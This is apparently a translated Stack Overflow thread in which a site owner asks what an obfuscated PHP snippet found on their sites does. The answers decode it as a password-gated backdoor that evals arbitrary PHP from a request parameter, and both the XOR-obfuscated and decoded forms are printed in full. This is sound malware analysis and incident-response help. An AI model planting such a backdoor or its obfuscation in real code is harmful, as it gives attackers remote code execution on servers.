堆棧內存溢出
  簡體   English   中英

解碼一個奇怪的,可能是惡意的PHP代碼

[英]Decoding a weird and possibly malicious PHP code

 原文  2012-01-11 01:44:46       php/ security/ encryption/ encoding

問題描述

我在我的一些網站上看到以下代碼: 

preg_replace("/lWkTSJcPlD6Ty3nInmjgvJ=vcL/e", "d=0nAheu6tYPSH36hrrw25iBpfJC3ZDVZB9aibJcJhscojWKPC8G7eHk=Rn3rqMGsJgPlpsvMaM20iBOl9UgbcGbutSaZehGoCWOsD=5dLucuvqUtA2Jc9lLr4mFXIMALiP4mPxFahhJSNeANUKqSv20ndDAmPBxyQpZfcf70BFQPjQc5aH"^"\x01KQ\x02iJ\x0c\x13\x1e\x1d\x2a\x236\x3c\x1bj4V\x2d\x25wd\x3c\x07\x232\x11dP2c\x0bsb\x1fGIJ\x27\x07\x7f\x40\x2f\x3fK5\x05\x0e\x01\x16\x7d\x14c\x3eo\x08Uu3\x1aRLpgT\x7fQh\x0e\x16KFuQxT\x00\x08sy\x0f\x08eS\x07\x05\x23R\x40\x12eSlW\x5bs\x0ed\x7eoUb\x1d\x5c\x17\x3f\x10\x17\x5d\x2a\x2dq\x2b\x13w\x1b6\x7c\x3f\x18\x29\x13\x1d\x2e\x28\x16\x2e\x2e\x28\x0cwiDyX=A\x0d\x1e\x2b\x3ff9\x1dj\x0a\x194\x02\x23wc\x3a\x3fc1\x05\x20\x1d\x1b\x165\x15\x7d\x3bJ\x5d\x17U\x3a\x2f\x25xCjCHCa", "lWkTSJcPlD6Ty3nInmjgvJ=vcL");
?>

我嘗試像正常的eval一樣解碼,並通過一些解析而沒有運氣。 任何人都知道如何解碼並查看它的作用?

它在preg_replace上使用/ e(eval)修飾符,但似乎沒有做任何事情//

2 個解決方案

解決方案1
 5 已采納  2012-01-11 02:24:43

看看第二部分,我注意到它的兩個字符串是xor'd在一起: 

php > $x="d=0nAheu6tYPSH36hrrw25iBpfJC3ZDVZB9aibJcJhscojWKPC8G7eHk=Rn3rqMGsJgPlpsvMaM20iBOl9UgbcGbutSaZehGoCWOsD=5dLucuvqUtA2Jc9lLr4mFXIMALiP4mPxFahhJSNeANUKqSv20ndDAmPBxyQpZfcf70BFQPjQc5aH";                                              
php > $y="\x01KQ\x02iJ\x0c\x13\x1e\x1d\x2a\x236\x3c\x1bj4V\x2d\x25wd\x3c\x07\x232\x11dP2c\x0bsb\x1fGIJ\x27\x07\x7f\x40\x2f\x3fK5\x05\x0e\x01\x16\x7d\x14c\x3eo\x08Uu3\x1aRLpgT\x7fQh\x0e\x16KFuQxT\x00\x08sy\x0f\x08eS\x07\x05\x23R\x40\x12eSlW\x5bs\x0ed\x7eoUb\x1d\x5c\x17\x3f\x10\x17\x5d\x2a\x2dq\x2b\x13w\x1b6\x7c\x3f\x18\x29\x13\x1d\x2e\x28\x16\x2e\x2e\x28\x0cwiDyX=A\x0d\x1e\x2b\x3ff9\x1dj\x0a\x194\x02\x23wc\x3a\x3fc1\x05\x20\x1d\x1b\x165\x15\x7d\x3bJ\x5d\x17U\x3a\x2f\x25xCjCHCa";
php > $z=$x^$y;
php > print $z;
eval("if(isset(\\$_REQUEST['ch']) && (md5(\\$_REQUEST['ch']) == '568bf80805f0a16c104efd05f626234a') && isset(\\$_REQUEST['php_code'])) { eval(\\$_REQUEST['php_code']); exit(); }")
php >

它在'ch'中查找“password”,如果密碼hash匹配,那么eval在php_code param中的內容。

我不確定preg_replace是如何進入的

編輯

似乎preg替換正在替換與替換不匹配的東西,導致剛解碼的東西運行。 考慮這個例子 

<?php
preg_replace("/X/e","eval('print 1;');",'X');
?>

如果你運行它只是打印1.查看你的訪問日志與那些url params(ch和php_code)的命中

解決方案2
 3  2012-01-11 02:25:49

只需取出正則表達式中的e ,這樣就可以在替換和echo顯替換后產生的代碼后,使eval成為表達式。 它安裝了一個后門,允許任何人eval通過URL發送的任何PHP代碼。

請參見http://codepad.viper-7.com/VUmML8

暫無
暫無

聲明:本站的技術帖子網頁,遵循CC BY-SA 4.0協議,如果您需要轉載,請注明本站網址或者原文地址。任何問題請咨詢:yoyou2525@163.com.

相關問題 惡意代碼和PHP Wordpress-發現惡意PHP代碼 剛發現惡意的PHP代碼 惡意PHP代碼注入到PHP文件中 PHP腳本:最后的惡意JavaScript代碼 PHP(可能是UTF8)編碼/解碼問題-顯示單個字符 PHP mysql代碼有助於解碼 這個php腳本會做什么? 是惡意的PHP代碼? 在PHP文件中找到惡意代碼。 它有什么作用? 惡意代碼注入了Drupal 7網站(html.tpl.php)
相關標簽
 
粵ICP備18138465號  © 2020-2024 STACKOOM.COM